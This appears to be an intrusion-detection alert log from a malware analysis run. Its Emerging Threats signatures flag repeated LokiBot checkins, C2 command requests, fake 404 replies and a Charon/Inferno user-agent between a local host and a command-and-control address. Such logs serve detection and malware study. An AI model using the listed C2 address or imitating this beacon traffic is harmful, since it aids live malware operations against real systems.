                                                                                        01/05/21-19:06:12.987731TCP2025483ET TROJAN LokiBot Fake 404 Response8049181185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:13.213064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.388159TCP2025483ET TROJAN LokiBot Fake 404 Response8049182185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:13.606387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.778989TCP2025483ET TROJAN LokiBot Fake 404 Response8049183185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.002546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.168912TCP2025483ET TROJAN LokiBot Fake 404 Response8049184185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.391399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.558086TCP2025483ET TROJAN LokiBot Fake 404 Response8049185185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.788464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.954180TCP2025483ET TROJAN LokiBot Fake 404 Response8049186185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.165872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.352806TCP2025483ET TROJAN LokiBot Fake 404 Response8049187185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.552401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.734059TCP2025483ET TROJAN LokiBot Fake 404 Response8049188185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.960354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.139385TCP2025483ET TROJAN LokiBot Fake 404 Response8049189185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.358508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.531882TCP2025483ET TROJAN LokiBot Fake 404 Response8049190185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.795879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.967213TCP2025483ET TROJAN LokiBot Fake 404 Response8049191185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.183871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.344388TCP2025483ET TROJAN LokiBot Fake 404 Response8049192185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.566777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.726876TCP2025483ET TROJAN LokiBot Fake 404 Response8049193185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.949146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.134410TCP2025483ET TROJAN LokiBot Fake 404 Response8049194185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.364453TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.531194TCP2025483ET TROJAN LokiBot Fake 404 Response8049195185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.788238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.959883TCP2025483ET TROJAN LokiBot Fake 404 Response8049196185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.176157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.341245TCP2025483ET TROJAN LokiBot Fake 404 Response8049197185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.576040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.751716TCP2025483ET TROJAN LokiBot Fake 404 Response8049198185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.958724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.125690TCP2025483ET TROJAN LokiBot Fake 404 Response8049199185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.390921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.569029TCP2025483ET TROJAN LokiBot Fake 404 Response8049200185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.950521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.111865TCP2025483ET TROJAN LokiBot Fake 404 Response8049201185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:21.679580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.837782TCP2025483ET TROJAN LokiBot Fake 404 Response8049202185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.303822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.484253TCP2025483ET TROJAN LokiBot Fake 404 Response8049203185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.694392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.877247TCP2025483ET TROJAN LokiBot Fake 404 Response8049204185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.094147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.267446TCP2025483ET TROJAN LokiBot Fake 404 Response8049205185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.470458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.640827TCP2025483ET TROJAN LokiBot Fake 404 Response8049206185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.862730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.026554TCP2025483ET TROJAN LokiBot Fake 404 Response8049207185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.246261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.246261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.440570TCP2025483ET TROJAN LokiBot Fake 404 Response8049208185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:24.648294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.648294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:24.816571TCP2025483ET TROJAN LokiBot Fake 404 Response8049209185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.024326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.024326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.203072TCP2025483ET TROJAN LokiBot Fake 404 Response8049210185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.428992TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.428992TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.591475TCP2025483ET TROJAN LokiBot Fake 404 Response8049211185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:25.813759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.813759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:25.992160TCP2025483ET TROJAN LokiBot Fake 404 Response8049212185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.197896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.197896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.381041TCP2025483ET TROJAN LokiBot Fake 404 Response8049213185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.599441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.599441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.766199TCP2025483ET TROJAN LokiBot Fake 404 Response8049214185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:26.971788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:26.971788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.131364TCP2025483ET TROJAN LokiBot Fake 404 Response8049215185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:27.359759TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.359759TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.547159TCP2025483ET TROJAN LokiBot Fake 404 Response8049216185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:27.753620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.753620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:27.916227TCP2025483ET TROJAN LokiBot Fake 404 Response8049217185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.127709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.127709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.287151TCP2025483ET TROJAN LokiBot Fake 404 Response8049218185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.505441TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.505441TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.661950TCP2025483ET TROJAN LokiBot Fake 404 Response8049219185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:28.880701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:28.880701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.048592TCP2025483ET TROJAN LokiBot Fake 404 Response8049220185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:29.244495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.244495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.409620TCP2025483ET TROJAN LokiBot Fake 404 Response8049221185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:29.630364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.630364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:29.797474TCP2025483ET TROJAN LokiBot Fake 404 Response8049222185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.014888TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.014888TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.193197TCP2025483ET TROJAN LokiBot Fake 404 Response8049223185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.409915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.409915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.572043TCP2025483ET TROJAN LokiBot Fake 404 Response8049224185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:30.786520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.786520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:30.947633TCP2025483ET TROJAN LokiBot Fake 404 Response8049225185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.159641TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.159641TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22185.206.215.56
